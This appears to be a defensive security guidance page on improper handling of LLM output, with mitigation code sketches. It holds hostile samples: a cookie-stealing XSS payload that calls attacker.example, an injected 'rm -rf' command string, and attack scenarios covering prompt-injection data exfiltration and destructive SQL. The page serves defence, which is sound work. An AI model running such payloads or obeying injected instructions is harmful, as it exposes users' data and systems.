
LLM05: Improper Output Handling

>Control Description

Improper Output Handling refers to insufficient validation, sanitization, and handling of LLM-generated outputs before they are passed downstream to other components and systems. Because LLM-generated content can be steered by prompt input, this behavior effectively gives users indirect access to additional functionality and can result in XSS, CSRF, SSRF, privilege escalation, or remote code execution on downstream systems.

>Vulnerability Types

  1. Remote Code Execution: LLM output passed directly into a system shell or eval function (see the sketch after this list)
  2. Cross-Site Scripting (XSS): JavaScript or Markdown generated by the model and interpreted by the browser
  3. SQL Injection: LLM-generated queries executed without proper parameterization
  4. Path Traversal: LLM output used to construct file paths without sanitization
  5. Email Injection: LLM-generated content in email templates enabling phishing attacks
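
As an illustration of the first item, the minimal Python sketch below (with hypothetical names such as `llm_reply` and `run_tool`) contrasts passing model output straight to a shell with dispatching it through a fixed allow-list; it is an example of the pattern, not a complete sandbox.

```python
import subprocess

# Hypothetical value for illustration: model output is attacker-influenced text.
llm_reply = "df -h; rm -rf /tmp/data"  # contains a second, injected command

# VULNERABLE: shell=True executes whatever the model produced.
# subprocess.run(llm_reply, shell=True)

# Safer: dispatch only commands from a fixed allow-list, with no shell involved.
ALLOWED_COMMANDS = {
    "disk_usage": ["df", "-h"],
    "uptime": ["uptime"],
}

def run_tool(requested: str) -> str:
    argv = ALLOWED_COMMANDS.get(requested.strip())
    if argv is None:
        raise ValueError(f"command not permitted: {requested!r}")
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout
```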

>Common Impacts

  • Remote code execution on backend systems
  • Cross-site scripting (XSS) attacks in web browsers
  • SQL injection and data breaches
  • Privilege escalation
  • Server-side request forgery (SSRF)

>Prevention & Mitigation Strategies

  1. Treat the model as any other user: adopt a zero-trust approach and apply proper input validation to responses coming back from the model
  2. Follow OWASP ASVS guidelines for effective input validation and sanitization
  3. Encode model output to mitigate undesired code execution by JavaScript or Markdown
  4. Implement context-aware output encoding based on where LLM output will be used (HTML-context sketch below)
  5. Use parameterized queries or prepared statements for all database operations (sketch below)
  6. Employ a strict Content Security Policy (CSP) to mitigate XSS risks (sketch below)
  7. Implement robust logging and monitoring to detect unusual patterns in LLM outputs
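
To make items 3 and 4 concrete, here is a minimal Python sketch of HTML-context encoding using the standard library's `html.escape`; the `render_llm_output` name and the payload string are illustrative, and other contexts (URL, JavaScript, CSS) need their own encoders.

```python
import html

def render_llm_output(text: str) -> str:
    """Encode model output for an HTML context before it reaches the browser.

    html.escape neutralizes <script> payloads and attribute breakouts; a
    different encoder would be required for URL, JavaScript, or CSS contexts.
    """
    return html.escape(text, quote=True)

# Example: an XSS payload the model might emit after a prompt injection.
payload = '<img src=x onerror="fetch(`https://attacker.example/?c=` + document.cookie)">'
safe_fragment = render_llm_output(payload)
# The escaped string renders as inert text instead of executing.
```

For item 5, a minimal sketch with Python's built-in `sqlite3` module; the table, column, and `find_orders` names are assumptions. The point is that any value derived from model output is passed only as a bound parameter, never concatenated into the SQL text.

```python
import sqlite3

def find_orders(conn: sqlite3.Connection, customer_name: str):
    """Use the LLM-derived value only as a bound parameter, never as SQL text."""
    # VULNERABLE: f"SELECT id, total FROM orders WHERE customer = '{customer_name}'"
    # Parameterized: the driver treats customer_name strictly as data.
    cur = conn.execute(
        "SELECT id, total FROM orders WHERE customer = ?", (customer_name,)
    )
    return cur.fetchall()
```

For item 6, one possible way to attach a strict CSP, sketched here with Flask's `after_request` hook; the exact policy directives would need tuning to the application's real asset origins.

```python
from flask import Flask

app = Flask(__name__)

@app.after_request
def apply_csp(response):
    # Restrict script sources and forbid inline scripts, so that even an
    # encoding slip-up cannot execute attacker-supplied JavaScript.
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"
    )
    return response
```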

>Attack Scenarios

#1 Extension Command Injection

An application uses an LLM extension to generate chatbot responses. The same extension also exposes administrative functions. Because the LLM's response is passed to the extension without validation, a crafted prompt can cause the extension to shut down for maintenance.

#2 Data Exfiltration via Summary

A user uses a website summarizer tool. The website includes a prompt injection instructing the LLM to capture sensitive content and send it to an attacker-controlled server.

#3 SQL Query Manipulation

An LLM-powered chat feature lets users craft SQL queries in natural language. A user asks for a query that deletes all database tables, and the generated statement is executed without scrutiny.
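
One way to blunt this scenario is to refuse anything that is not a single read-only statement before execution, and to run LLM-generated queries under a least-privilege, read-only database role. A rough Python sketch follows; the `is_safe_readonly_query` helper is hypothetical and deliberately simplistic.

```python
def is_safe_readonly_query(sql: str) -> bool:
    """Reject anything that is not a single SELECT statement.

    A crude allow-list check; production systems should additionally execute
    LLM-generated queries under a read-only database role.
    """
    statements = [s.strip() for s in sql.split(";") if s.strip()]
    if len(statements) != 1:
        return False
    return statements[0].lower().startswith("select")

# The destructive request from the scenario is refused:
assert not is_safe_readonly_query("DROP TABLE users; DROP TABLE orders;")
assert is_safe_readonly_query("SELECT name FROM products WHERE price < 10")
```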

#4 XSS via Generated Content

A web app uses an LLM to generate content from user prompts without output sanitization. An attacker submits a crafted prompt that causes the LLM to return an unsanitized JavaScript payload, which then executes in the victim's browser.
